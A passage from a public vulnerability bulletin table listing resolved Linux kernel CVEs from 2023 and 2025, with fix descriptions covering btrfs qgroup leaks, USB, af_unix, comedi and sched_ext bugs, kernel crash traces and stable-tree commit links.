->qgroup_rsv_size == 0. The optimization in btrfs_insert_delayed_dir_index() sets ->qgroup_rsv_reserved = 0. Then later on when we call btrfs_subvolume_release_metadata() which has btrfs_block_rsv_release(fs_info, rsv, (u64)-1, &qgroup_to_release); btrfs_qgroup_convert_reserved_meta(root, qgroup_to_release); qgroup_to_release is set to 0, and we do not convert the reserved metadata space. The problem here is that the block rsv code has been unconditionally messing with ->qgroup_rsv_reserved, because the main place this is used is delalloc, and any time we call btrfs_block_rsv_release() we do it with qgroup_to_release set, and thus do the proper accounting. The subvolume code is the only other code that uses the qgroup reservation stuff, but it's intermingled with the above optimization, and thus was getting its reservation freed out from underneath it and thus leaking the reserved space. The solution is to simply not mess with the qgroup reservations if we don't have qgroup_to_release set. This works with the existing code as anything that messes with the delalloc reservations always have qgroup_to_release set. This fixes the leak that Boris was observing. | 2025-12-24 | not yet calculated | CVE-2023-54158 | https://git.kernel.org/stable/c/1e05bf5e80bb1161b7294c9ce5292b26232ab853 https://git.kernel.org/stable/c/148b16cd30b202999ec5b534e3e5d8ab4b766f21 https://git.kernel.org/stable/c/f264be24146bee2d652010a18ae2517df5856261 https://git.kernel.org/stable/c/15e877e5923ec6d6caa5e447dcc4b79a8ff7cc53 https://git.kernel.org/stable/c/04ff6bd0317735791ef3e443c7c89f3c0dda548d https://git.kernel.org/stable/c/478bd15f46b6e3aae78aac4f3788697f1546eea6 https://git.kernel.org/stable/c/d246331b78cbef86237f9c22389205bc9b4e1cc1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: mtu3: fix kernel panic at qmu transfer done irq handler When handle qmu transfer irq, it will unlock @mtu->lock before give back request, if another thread handle disconnect event at the same time, and try to disable ep, it may lock @mtu->lock and free qmu ring, then qmu irq hanlder may get a NULL gpd, avoid the KE by checking gpd's value before handling it. e.g. qmu done irq on cpu0 thread running on cpu1 qmu_done_tx() handle gpd [0] mtu3_requ_complete() mtu3_gadget_ep_disable() unlock @mtu->lock give back request lock @mtu->lock mtu3_ep_disable() mtu3_gpd_ring_free() unlock @mtu->lock lock @mtu->lock get next gpd [1] [1]: goto [0] to handle next gpd, and next gpd may be NULL. | 2025-12-24 | not yet calculated | CVE-2023-54159 | https://git.kernel.org/stable/c/26ca30516b2c49dd04c134cbdf122311c538df98 https://git.kernel.org/stable/c/012936502a9cb7b0604e85bb961eb15e2bb40dd9 https://git.kernel.org/stable/c/ee53a7a88027cea765c68f3b00a50b8f58d6f786 https://git.kernel.org/stable/c/f26273428657ef4ca74740e578ae45a3be492f6f https://git.kernel.org/stable/c/b636aff94a67be46582d4321d11743f1a10cc2c1 https://git.kernel.org/stable/c/3a7d4959560a2ee493ef222e3b63d359365f41ec https://git.kernel.org/stable/c/d28f4091ea7ec3510fd6a3c6d433234e7a2bef14 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: firmware: arm_sdei: Fix sleep from invalid context BUG Running a preempt-rt (v6.2-rc3-rt1) based kernel on an Ampere Altra triggers: BUG: sleeping function called from invalid context at kernel/locking/spinlock_rt.c:46 in_atomic(): 0, irqs_disabled(): 128, non_block: 0, pid: 24, name: cpuhp/0 preempt_count: 0, expected: 0 RCU nest depth: 0, expected: 0 3 locks held by cpuhp/0/24: #0: ffffda30217c70d0 (cpu_hotplug_lock){++++}-{0:0}, at: cpuhp_thread_fun+0x5c/0x248 #1: ffffda30217c7120 (cpuhp_state-up){+.+.}-{0:0}, at: cpuhp_thread_fun+0x5c/0x248 #2: ffffda3021c711f0 (sdei_list_lock){....}-{3:3}, at: sdei_cpuhp_up+0x3c/0x130 irq event stamp: 36 hardirqs last enabled at (35): [<ffffda301e85b7bc>] finish_task_switch+0xb4/0x2b0 hardirqs last disabled at (36): [<ffffda301e812fec>] cpuhp_thread_fun+0x21c/0x248 softirqs last enabled at (0): [<ffffda301e80b184>] copy_process+0x63c/0x1ac0 softirqs last disabled at (0): [<0000000000000000>] 0x0 CPU: 0 PID: 24 Comm: cpuhp/0 Not tainted 5.19.0-rc3-rt5-[...] Hardware name: WIWYNN Mt.Jade Server [...] Call trace: dump_backtrace+0x114/0x120 show_stack+0x20/0x70 dump_stack_lvl+0x9c/0xd8 dump_stack+0x18/0x34 __might_resched+0x188/0x228 rt_spin_lock+0x70/0x120 sdei_cpuhp_up+0x3c/0x130 cpuhp_invoke_callback+0x250/0xf08 cpuhp_thread_fun+0x120/0x248 smpboot_thread_fn+0x280/0x320 kthread+0x130/0x140 ret_from_fork+0x10/0x20 sdei_cpuhp_up() is called in the STARTING hotplug section, which runs with interrupts disabled. Use a CPUHP_AP_ONLINE_DYN entry instead to execute the cpuhp cb later, with preemption enabled. SDEI originally got its own cpuhp slot to allow interacting with perf. It got superseded by pNMI and this early slot is not relevant anymore. [1] Some SDEI calls (e.g. SDEI_1_0_FN_SDEI_PE_MASK) take actions on the calling CPU. It is checked that preemption is disabled for them. _ONLINE cpuhp cb are executed in the 'per CPU hotplug thread'. Preemption is enabled in those threads, but their cpumask is limited to 1 CPU. Move 'WARN_ON_ONCE(preemptible())' statements so that SDEI cpuhp cb don't trigger them. Also add a check for the SDEI_1_0_FN_SDEI_PRIVATE_RESET SDEI call which acts on the calling CPU. [1]: https://lore.kernel.org/all/5813b8c5-ae3e-87fd-fccc-94c9cd08816d@arm.com/ | 2025-12-24 | not yet calculated | CVE-2023-54160 | https://git.kernel.org/stable/c/59842a9ba27d5390ae5bf3233a92cad3a26d495c https://git.kernel.org/stable/c/48ac727ea4a3577eb1b4e24f807ba532c47930f9 https://git.kernel.org/stable/c/7d8f5ccc826b39e05ff252b1fccd808c7a0725e0 https://git.kernel.org/stable/c/66caf22787714c925e755719c293aaf3cb0b873b https://git.kernel.org/stable/c/a8267bc8de736cae927165191b52fbc20d101dd1 https://git.kernel.org/stable/c/18d5ea5b746120a3972e6c347ad9428228445327 https://git.kernel.org/stable/c/d2c48b2387eb89e0bf2a2e06e30987cf410acad4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: af_unix: Fix null-ptr-deref in unix_stream_sendpage(). Bing-Jhong Billy Jheng reported null-ptr-deref in unix_stream_sendpage() with detailed analysis and a nice repro. unix_stream_sendpage() tries to add data to the last skb in the peer's recv queue without locking the queue. If the peer's FD is passed to another socket and the socket's FD is passed to the peer, there is a loop between them. If we close both sockets without receiving FD, the sockets will be cleaned up by garbage collection. The garbage collection iterates such sockets and unlinks skb with FD from the socket's receive queue under the queue's lock. So, there is a race where unix_stream_sendpage() could access an skb locklessly that is being released by garbage collection, resulting in use-after-free. To avoid the issue, unix_stream_sendpage() must lock the peer's recv queue. Note the issue does not exist in 6.5+ thanks to the recent sendpage() refactoring. This patch is originally written by Linus Torvalds. BUG: unable to handle page fault for address: ffff988004dd6870 PF: supervisor read access in kernel mode PF: error_code(0x0000) - not-present page PGD 0 P4D 0 PREEMPT SMP PTI CPU: 4 PID: 297 Comm: garbage_uaf Not tainted 6.1.46 #1 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 RIP: 0010:kmem_cache_alloc_node+0xa2/0x1e0 Code: c0 0f 84 32 01 00 00 41 83 fd ff 74 10 48 8b 00 48 c1 e8 3a 41 39 c5 0f 85 1c 01 00 00 41 8b 44 24 28 49 8b 3c 24 48 8d 4a 40 <49> 8b 1c 06 4c 89 f0 65 48 0f c7 0f 0f 94 c0 84 c0 74 a1 41 8b 44 RSP: 0018:ffffc9000079fac0 EFLAGS: 00000246 RAX: 0000000000000070 RBX: 0000000000000005 RCX: 000000000001a284 RDX: 000000000001a244 RSI: 0000000000400cc0 RDI: 000000000002eee0 RBP: 0000000000400cc0 R08: 0000000000400cc0 R09: 0000000000000003 R10: 0000000000000001 R11: 0000000000000000 R12: ffff888003970f00 R13: 00000000ffffffff R14: ffff988004dd6800 R15: 00000000000000e8 FS: 00007f174d6f3600(0000) GS:ffff88807db00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: ffff988004dd6870 CR3: 00000000092be000 CR4: 00000000007506e0 PKRU: 55555554 Call Trace: <TASK> ? __die_body.cold+0x1a/0x1f ? page_fault_oops+0xa9/0x1e0 ? fixup_exception+0x1d/0x310 ? exc_page_fault+0xa8/0x150 ? asm_exc_page_fault+0x22/0x30 ? kmem_cache_alloc_node+0xa2/0x1e0 ? __alloc_skb+0x16c/0x1e0 __alloc_skb+0x16c/0x1e0 alloc_skb_with_frags+0x48/0x1e0 sock_alloc_send_pskb+0x234/0x270 unix_stream_sendmsg+0x1f5/0x690 sock_sendmsg+0x5d/0x60 ____sys_sendmsg+0x210/0x260 ___sys_sendmsg+0x83/0xd0 ? kmem_cache_alloc+0xc6/0x1c0 ? avc_disable+0x20/0x20 ? percpu_counter_add_batch+0x53/0xc0 ? alloc_empty_file+0x5d/0xb0 ? alloc_file+0x91/0x170 ? alloc_file_pseudo+0x94/0x100 ? __fget_light+0x9f/0x120 __sys_sendmsg+0x54/0xa0 do_syscall_64+0x3b/0x90 entry_SYSCALL_64_after_hwframe+0x69/0xd3 RIP: 0033:0x7f174d639a7d Code: 28 89 54 24 1c 48 89 74 24 10 89 7c 24 08 e8 8a c1 f4 ff 8b 54 24 1c 48 8b 74 24 10 41 89 c0 8b 7c 24 08 b8 2e 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 33 44 89 c7 48 89 44 24 08 e8 de c1 f4 ff 48 RSP: 002b:00007ffcb563ea50 EFLAGS: 00000293 ORIG_RAX: 000000000000002e RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f174d639a7d RDX: 0000000000000000 RSI: 00007ffcb563eab0 RDI: 0000000000000007 RBP: 00007ffcb563eb10 R08: 0000000000000000 R09: 00000000ffffffff R10: 00000000004040a0 R11: 0000000000000293 R12: 00007ffcb563ec28 R13: 0000000000401398 R14: 0000000000403e00 R15: 00007f174d72c000 </TASK> | 2025-12-24 | not yet calculated | CVE-2023-54161 | https://git.kernel.org/stable/c/d39fc9b94dc0719afa4bc8e58341a5eb41febef3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/xe/guc: Fix stack_depot usage Add missing stack_depot_init() call when CONFIG_DRM_XE_DEBUG_GUC is enabled to fix the following call stack: [] BUG: kernel NULL pointer dereference, address: 0000000000000000 [] Workqueue: drm_sched_run_job_work [gpu_sched] [] RIP: 0010:stack_depot_save_flags+0x172/0x870 [] Call Trace: [] <TASK> [] fast_req_track+0x58/0xb0 [xe] (cherry picked from commit 64fdf496a6929a0a194387d2bb5efaf5da2b542f) | 2025-12-22 | not yet calculated | CVE-2025-68326 | https://git.kernel.org/stable/c/1966838d1c82149cbf4a652322d26a6e5aae9c4e https://git.kernel.org/stable/c/0e234632e39bd21dd28ffc9ba3ae8eec4deb949c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: renesas_usbhs: Fix synchronous external abort on unbind A synchronous external abort occurs on the Renesas RZ/G3S SoC if unbind is executed after the configuration sequence described above: modprobe usb_f_ecm modprobe libcomposite modprobe configfs cd /sys/kernel/config/usb_gadget mkdir -p g1 cd g1 echo "0x1d6b" > idVendor echo "0x0104" > idProduct mkdir -p strings/0x409 echo "0123456789" > strings/0x409/serialnumber echo "Renesas." > strings/0x409/manufacturer echo "Ethernet Gadget" > strings/0x409/product mkdir -p functions/ecm.usb0 mkdir -p configs/c.1 mkdir -p configs/c.1/strings/0x409 echo "ECM" > configs/c.1/strings/0x409/configuration if [ ! -L configs/c.1/ecm.usb0 ]; then ln -s functions/ecm.usb0 configs/c.1 fi echo 11e20000.usb > UDC echo 11e20000.usb > /sys/bus/platform/drivers/renesas_usbhs/unbind The displayed trace is as follows: Internal error: synchronous external abort: 0000000096000010 [#1] SMP CPU: 0 UID: 0 PID: 188 Comm: sh Tainted: G M 6.17.0-rc7-next-20250922-00010-g41050493b2bd #55 PREEMPT Tainted: [M]=MACHINE_CHECK Hardware name: Renesas SMARC EVK version 2 based on r9a08g045s33 (DT) pstate: 604000c5 (nZCv daIF +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : usbhs_sys_function_pullup+0x10/0x40 [renesas_usbhs] lr : usbhsg_update_pullup+0x3c/0x68 [renesas_usbhs] sp : ffff8000838b3920 x29: ffff8000838b3920 x28: ffff00000d585780 x27: 0000000000000000 x26: 0000000000000000 x25: 0000000000000000 x24: ffff00000c3e3810 x23: ffff00000d5e5c80 x22: ffff00000d5e5d40 x21: 0000000000000000 x20: 0000000000000000 x19: ffff00000d5e5c80 x18: 0000000000000020 x17: 2e30303230316531 x16: 312d7968703a7968 x15: 3d454d414e5f4344 x14: 000000000000002c x13: 0000000000000000 x12: 0000000000000000 x11: ffff00000f358f38 x10: ffff00000f358db0 x9 : ffff00000b41f418 x8 : 0101010101010101 x7 : 7f7f7f7f7f7f7f7f x6 : fefefeff6364626d x5 : 8080808000000000 x4 : 000000004b5ccb9d x3 : 0000000000000000 x2 : 0000000000000000 x1 : ffff800083790000 x0 : ffff00000d5e5c80 Call trace: usbhs_sys_function_pullup+0x10/0x40 [renesas_usbhs] (P) usbhsg_pullup+0x4c/0x7c [renesas_usbhs] usb_gadget_disconnect_locked+0x48/0xd4 gadget_unbind_driver+0x44/0x114 device_remove+0x4c/0x80 device_release_driver_internal+0x1c8/0x224 device_release_driver+0x18/0x24 bus_remove_device+0xcc/0x10c device_del+0x14c/0x404 usb_del_gadget+0x88/0xc0 usb_del_gadget_udc+0x18/0x30 usbhs_mod_gadget_remove+0x24/0x44 [renesas_usbhs] usbhs_mod_remove+0x20/0x30 [renesas_usbhs] usbhs_remove+0x98/0xdc [renesas_usbhs] platform_remove+0x20/0x30 device_remove+0x4c/0x80 device_release_driver_internal+0x1c8/0x224 device_driver_detach+0x18/0x24 unbind_store+0xb4/0xb8 drv_attr_store+0x24/0x38 sysfs_kf_write+0x7c/0x94 kernfs_fop_write_iter+0x128/0x1b8 vfs_write+0x2ac/0x350 ksys_write+0x68/0xfc __arm64_sys_write+0x1c/0x28 invoke_syscall+0x48/0x110 el0_svc_common.constprop.0+0xc0/0xe0 do_el0_svc+0x1c/0x28 el0_svc+0x34/0xf0 el0t_64_sync_handler+0xa0/0xe4 el0t_64_sync+0x198/0x19c Code: 7100003f 1a9f07e1 531c6c22 f9400001 (79400021) ---[ end trace 0000000000000000 ]--- note: sh[188] exited with irqs disabled note: sh[188] exited with preempt_count 1 The issue occurs because usbhs_sys_function_pullup(), which accesses the IP registers, is executed after the USBHS clocks have been disabled. The problem is reproducible on the Renesas RZ/G3S SoC starting with the addition of module stop in the clock enable/disable APIs. With module stop functionality enabled, a bus error is expected if a master accesses a module whose clock has been stopped and module stop activated. Disable the IP clocks at the end of remove. | 2025-12-22 | not yet calculated | CVE-2025-68327 | https://git.kernel.org/stable/c/fd1a7bf3a8cac13f6d2d52d8c7570ba41621db9a https://git.kernel.org/stable/c/cd5e86e34c66a831b5cb9b720ad411a006962cc8 https://git.kernel.org/stable/c/230b1bc1310edcd5c1b71dcd6b77ccba43139cb5 https://git.kernel.org/stable/c/9d86bc8b188a77c8d6f7252280ec2bd24ad6fbc1 https://git.kernel.org/stable/c/26838f147aeaa8f820ff799d72815fba5e209bd9 https://git.kernel.org/stable/c/aa658a6d5ac21c7cde54c6d015f2d4daff32e02d https://git.kernel.org/stable/c/eb9ac779830b2235847b72cb15cf07c7e3333c5e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: firmware: stratix10-svc: fix bug in saving controller data Fix the incorrect usage of platform_set_drvdata and dev_set_drvdata. They both are of the same data and overrides each other. This resulted in the rmmod of the svc driver to fail and throw a kernel panic for kthread_stop and fifo free. | 2025-12-22 | not yet calculated | CVE-2025-68328 | https://git.kernel.org/stable/c/9d0a330abd9e49bcebf6307aac185081bde49a43 https://git.kernel.org/stable/c/354fb03002da0970d337f0d3edbeb46cc4fa6f41 https://git.kernel.org/stable/c/b359df793f609b1efce31dadfe6883ec73852619 https://git.kernel.org/stable/c/71796c91ee8e33faf4434a9e210b5063c28ea907 https://git.kernel.org/stable/c/60ab1851614e6007344042b66da6e31d1cc26cb3 https://git.kernel.org/stable/c/bd226fa02ed6db6fce0fae010802f0950fd14fb9 https://git.kernel.org/stable/c/d0fcf70c680e4d1669fcb3a8632f41400b9a73c2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tracing: Fix WARN_ON in tracing_buffers_mmap_close for split VMAs When a VMA is split (e.g., by partial munmap or MAP_FIXED), the kernel calls vm_ops->close on each portion. For trace buffer mappings, this results in ring_buffer_unmap() being called multiple times while ring_buffer_map() was only called once. This causes ring_buffer_unmap() to return -ENODEV on subsequent calls because user_mapped is already 0, triggering a WARN_ON. Trace buffer mappings cannot support partial mappings because the ring buffer structure requires the complete buffer including the meta page. Fix this by adding a may_split callback that returns -EINVAL to prevent VMA splits entirely. | 2025-12-22 | not yet calculated | CVE-2025-68329 | https://git.kernel.org/stable/c/922fdd0b755a84f9933b3ca195f60092b6bb88ee https://git.kernel.org/stable/c/45053c12c45f0fb8ef6ab95118dd928d2fec0255 https://git.kernel.org/stable/c/b042fdf18e89a347177a49e795d8e5184778b5b6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iio: accel: bmc150: Fix irq assumption regression The code in bmc150-accel-core.c unconditionally calls bmc150_accel_set_interrupt() in the iio_buffer_setup_ops, such as on the runtime PM resume path giving a kernel splat like this if the device has no interrupts: Unable to handle kernel NULL pointer dereference at virtual address 00000001 when read PC is at bmc150_accel_set_interrupt+0x98/0x194 LR is at __pm_runtime_resume+0x5c/0x64 (...) Call trace: bmc150_accel_set_interrupt from bmc150_accel_buffer_postenable+0x40/0x108 bmc150_accel_buffer_postenable from __iio_update_buffers+0xbe0/0xcbc __iio_update_buffers from enable_store+0x84/0xc8 enable_store from kernfs_fop_write_iter+0x154/0x1b4 This bug seems to have been in the driver since the beginning, but it only manifests recently, I do not know why. Store the IRQ number in the state struct, as this is a common pattern in other drivers, then use this to determine if we have IRQ support or not. | 2025-12-22 | not yet calculated | CVE-2025-68330 | https://git.kernel.org/stable/c/aad9d048a3211c48ec02efa405bf462856feb862 https://git.kernel.org/stable/c/c891f504bb66604c822e7985e093cf39b97fdeb0 https://git.kernel.org/stable/c/cdd4a9e98004bd7c7488311951fa6dbae38b2b80 https://git.kernel.org/stable/c/65ad4ed983fd9ee0259d86391d6a53f78203918c https://git.kernel.org/stable/c/93eaa5ddc5fc4f50ac396afad8ce261102ebd4f3 https://git.kernel.org/stable/c/3aa385a9c75c09b59dcab2ff76423439d23673ab |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: uas: fix urb unmapping issue when the uas device is remove during ongoing data transfer When a UAS device is unplugged during data transfer, there is a probability of a system panic occurring. The root cause is an access to an invalid memory address during URB callback handling. Specifically, this happens when the dma_direct_unmap_sg() function is called within the usb_hcd_unmap_urb_for_dma() interface, but the sg->dma_address field is 0 and the sg data structure has already been freed. The SCSI driver sends transfer commands by invoking uas_queuecommand_lck() in uas.c, using the uas_submit_urbs() function to submit requests to USB. Within the uas_submit_urbs() implementation, three URBs (sense_urb, data_urb, and cmd_urb) are sequentially submitted. Device removal may occur at any point during uas_submit_urbs execution, which may result in URB submission failure. However, some URBs might have been successfully submitted before the failure, and uas_submit_urbs will return the -ENODEV error code in this case. The current error handling directly calls scsi_done(). In the SCSI driver, this eventually triggers scsi_complete() to invoke scsi_end_request() for releasing the sgtable. The successfully submitted URBs, when being unlinked to giveback, call usb_hcd_unmap_urb_for_dma() in hcd.c, leading to exceptions during sg unmapping operations since the sg data structure has already been freed. This patch modifies the error condition check in the uas_submit_urbs() function. When a UAS device is removed but one or more URBs have already been successfully submitted to USB, it avoids immediately invoking scsi_done() and save the cmnd to devinfo->cmnd array. If the successfully submitted URBs is completed before devinfo->resetting being set, then the scsi_done() function will be called within uas_try_complete() after all pending URB operations are finalized. Otherwise, the scsi_done() function will be called within uas_zap_pending(), which is executed after usb_kill_anchored_urbs(). The error handling only takes effect when uas_queuecommand_lck() calls uas_submit_urbs() and returns the error value -ENODEV . In this case, the device is disconnected, and the flow proceeds to uas_disconnect(), where uas_zap_pending() is invoked to call uas_try_complete(). | 2025-12-22 | not yet calculated | CVE-2025-68331 | https://git.kernel.org/stable/c/6289fc489e94c9beb6be2b502ccc263663733d72 https://git.kernel.org/stable/c/66ac05e7b0d6bbd1bee9fcf729e20fd4cce86d17 https://git.kernel.org/stable/c/75f8e2643085db4f7e136fc6b368eb114dd80a64 https://git.kernel.org/stable/c/e3a55221f4de080cb7a91ba10f01c4f708603f8d https://git.kernel.org/stable/c/2b90a8131c83f6f2be69397d2b7d14d217d95d2f https://git.kernel.org/stable/c/426edbfc88b22601ea34a441a469092e7b301c52 https://git.kernel.org/stable/c/26d56a9fcb2014b99e654127960aa0a48a391e3c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: comedi: c6xdigio: Fix invalid PNP driver unregistration The Comedi low-level driver "c6xdigio" seems to be for a parallel port connected device. When the Comedi core calls the driver's Comedi "attach" handler `c6xdigio_attach()` to configure a Comedi to use this driver, it tries to enable the parallel port PNP resources by registering a PNP driver with `pnp_register_driver()`, but ignores the return value. (The `struct pnp_driver` it uses has only the `name` and `id_table` members filled in.) The driver's Comedi "detach" handler `c6xdigio_detach()` unconditionally unregisters the PNP driver with `pnp_unregister_driver()`. It is possible for `c6xdigio_attach()` to return an error before it calls `pnp_register_driver()` and it is possible for the call to `pnp_register_driver()` to return an error (that is ignored). In both cases, the driver should not be calling `pnp_unregister_driver()` as it does in `c6xdigio_detach()`. (Note that `c6xdigio_detach()` will be called by the Comedi core if `c6xdigio_attach()` returns an error, or if the Comedi core decides to detach the Comedi device from the driver for some other reason.) The unconditional call to `pnp_unregister_driver()` without a previous successful call to `pnp_register_driver()` will cause `driver_unregister()` to issue a warning "Unexpected driver unregister!". This was detected by Syzbot [1]. Also, the PNP driver registration and unregistration should be done at module init and exit time, respectively, not when attaching or detaching Comedi devices to the driver. (There might be more than one Comedi device being attached to the driver, although that is unlikely.) Change the driver to do the PNP driver registration at module init time, and the unregistration at module exit time. Since `c6xdigio_detach()` now only calls `comedi_legacy_detach()`, remove the function and change the Comedi driver "detach" handler to `comedi_legacy_detach`. ------------------------------------------- [1] Syzbot sample crash report: Unexpected driver unregister! WARNING: CPU: 0 PID: 5970 at drivers/base/driver.c:273 driver_unregister drivers/base/driver.c:273 [inline] WARNING: CPU: 0 PID: 5970 at drivers/base/driver.c:273 driver_unregister+0x90/0xb0 drivers/base/driver.c:270 Modules linked in: CPU: 0 UID: 0 PID: 5970 Comm: syz.0.17 Not tainted syzkaller #0 PREEMPT(full) Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/02/2025 RIP: 0010:driver_unregister drivers/base/driver.c:273 [inline] RIP: 0010:driver_unregister+0x90/0xb0 drivers/base/driver.c:270 Code: 48 89 ef e8 c2 e6 82 fc 48 89 df e8 3a 93 ff ff 5b 5d e9 c3 6d d9 fb e8 be 6d d9 fb 90 48 c7 c7 e0 f8 1f 8c e8 51 a2 97 fb 90 <0f> 0b 90 90 5b 5d e9 a5 6d d9 fb e8 e0 f4 41 fc eb 94 e8 d9 f4 41 RSP: 0018:ffffc9000373f9a0 EFLAGS: 00010282 RAX: 0000000000000000 RBX: ffffffff8ff24720 RCX: ffffffff817b6ee8 RDX: ffff88807c932480 RSI: ffffffff817b6ef5 RDI: 0000000000000001 RBP: 0000000000000000 R08: 0000000000000001 R09: 0000000000000000 R10: 0000000000000001 R11: 0000000000000001 R12: ffffffff8ff24660 R13: dffffc0000000000 R14: 0000000000000000 R15: ffff88814cca0000 FS: 000055556dab1500(0000) GS:ffff8881249d9000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 000055f77f285cd0 CR3: 000000007d871000 CR4: 00000000003526f0 Call Trace: <TASK> comedi_device_detach_locked+0x12f/0xa50 drivers/comedi/drivers.c:207 comedi_device_detach+0x67/0xb0 drivers/comedi/drivers.c:215 comedi_device_attach+0x43d/0x900 drivers/comedi/drivers.c:1011 do_devconfig_ioctl+0x1b1/0x710 drivers/comedi/comedi_fops.c:872 comedi_unlocked_ioctl+0x165d/0x2f00 drivers/comedi/comedi_fops.c:2178 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:597 [inline] __se_sys_ioctl fs/ioctl.c:583 [inline] __x64_sys_ioctl+0x18e/0x210 fs/ioctl.c:583 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_sys ---truncated--- | 2025-12-22 | not yet calculated | CVE-2025-68332 | https://git.kernel.org/stable/c/9fd8c8ad35c8d2390ce5ca2eb523c044bebdc072 https://git.kernel.org/stable/c/698149d797d0178162f394c55d4ed52aa0e0b7f6 https://git.kernel.org/stable/c/888f7e2847bcb9df8257e656e1e837828942c53b https://git.kernel.org/stable/c/72262330f7b3ad2130e800cecf02adcce3c32c77 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sched_ext: Fix possible deadlock in the deferred_irq_workfn() For PREEMPT_RT=y kernels, the deferred_irq_workfn() is executed in the per-cpu irq_work/* task context and not disable-irq, if the rq returned by container_of() is current CPU's rq, the following scenarios may occur: lock(&rq->__lock); <Interrupt> lock(&rq->__lock); This commit use IRQ_WORK_INIT_HARD() to replace init_irq_work() to initialize rq->scx.deferred_irq_work, make the deferred_irq_workfn() is always invoked in hard-irq context. | 2025-12-22 | not yet calculated | CVE-2025-68333 | https://git.kernel.org/stable/c/600b4379b9a7ba41340d652211fb29699da4c629 https://git.kernel.org/stable/c/a257e974210320ede524f340ffe16bf4bf0dda1e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: platform/x86/amd/pmc: Add support for Van Gogh SoC The ROG Xbox Ally (non-X) SoC features a similar architecture to the Steam Deck. While the Steam Deck supports S3 (s2idle causes a crash), this support was dropped by the Xbox Ally which only S0ix suspend. Since the handler is missing here, this causes the device to not suspend and the AMD GPU driver to crash while trying to resume afterwards due to a power hang. | 2025-12-22 | not yet calculated | CVE-2025-68334 | https://git.kernel.org/stable/c/9654c56b111cd1415aca7e77f0c63c109453c409 https://git.kernel.org/stable/c/db4a3f0fbedb0398f77b9047e8b8bb2b49f355bb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: comedi: pcl818: fix null-ptr-deref in pcl818_ai_cancel() Syzbot identified an issue [1] in pcl818_ai_cancel(), which stems from the fact that in case of early device detach via pcl818_detach(), subdevice dev->read_subdev may not have initialized its pointer to &struct comedi_async as intended. Thus, any such dereferencing of &s->async->cmd will lead to general protection fault and kernel crash. Mitigate this problem by removing a call to pcl818_ai_cancel() from pcl818_detach() altogether. This way, if the subdevice setups its support for async commands, everything async-related will be handled via subdevice's own ->cancel() function in comedi_device_detach_locked() even before pcl818_detach(). If no support for asynchronous commands is provided, there is no need to cancel anything either. [1] Syzbot crash: Oops: general protection fault, probably for non-canonical address 0xdffffc0000000005: 0000 [#1] SMP KASAN PTI KASAN: null-ptr-deref in range [0x0000000000000028-0x000000000000002f] CPU: 1 UID: 0 PID: 6050 Comm: syz.0.18 Not tainted syzkaller #0 PREEMPT(full) Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 08/18/2025 RIP: 0010:pcl818_ai_cancel+0x69/0x3f0 drivers/comedi/drivers/pcl818.c:762 ... Call Trace: <TASK> pcl818_detach+0x66/0xd0 drivers/comedi/drivers/pcl818.c:1115 comedi_device_detach_locked+0x178/0x750 drivers/comedi/drivers.c:207 do_devconfig_ioctl drivers/comedi/comedi_fops.c:848 [inline] comedi_unlocked_ioctl+0xcde/0x1020 drivers/comedi/comedi_fops.c:2178 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:597 [inline] ... | 2025-12-22 | not yet calculated | CVE-2025-68335 | https://git.kernel.org/stable/c/5caa40e7c6a43e08e3574f990865127705c22861 https://git.kernel.org/stable/c/d948c53dec36dafe182631457597c49c1f1df5ea https://git.kernel.org/stable/c/877adccfacb32687b90714a27cfb09f444fdfa16 https://git.kernel.org/stable/c/a51f025b5038abd3d22eed2ede4cd46793d89565 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: locking/spinlock/debug: Fix data-race in do_raw_write_lock KCSAN reports: BUG: KCSAN: data-race in do_raw_write_lock / do_raw_write_lock write (marked) to 0xffff800009cf504c of 4 bytes by task 1102 on cpu 1: do_raw_write_lock+0x120/0x204 _raw_write_lock_irq do_exit call_usermodehelper_exec_async ret_from_fork read to 0xffff800009cf504c of 4 bytes by task 1103 on cpu 0: do_raw_write_lock+0x88/0x204 _raw_write_lock_irq do_exit call_usermodehelper_exec_async ret_from_fork value changed: 0xffffffff -> 0x00000001 Reported by Kernel Concurrency Sanitizer on: CPU: 0 PID: 1103 Comm: kworker/u4:1 6.1.111 Commit 1a365e822372 ("locking/spinlock/debug: Fix various data races") has adressed most of these races, but seems to be not consistent/not complete. >From do_raw_write_lock() only debug_write_lock_after() part has been converted to WRITE_ONCE(), but not debug_write_lock_before() part. Do it now. | 2025-12-22 | not yet calculated | CVE-2025-68336 | https://git.kernel.org/stable/c/b163a5e8c703201c905d6ec7920ed79d167e8442 https://git.kernel.org/stable/c/16b3590c0e1e615757dade098c8fbc0d4f040c76 https://git.kernel.org/stable/c/396a9270a7b90886be501611b13aa636f2e8c703 https://git.kernel.org/stable/c/c14ecb555c3ee80eeb030a4e46d00e679537f03a |
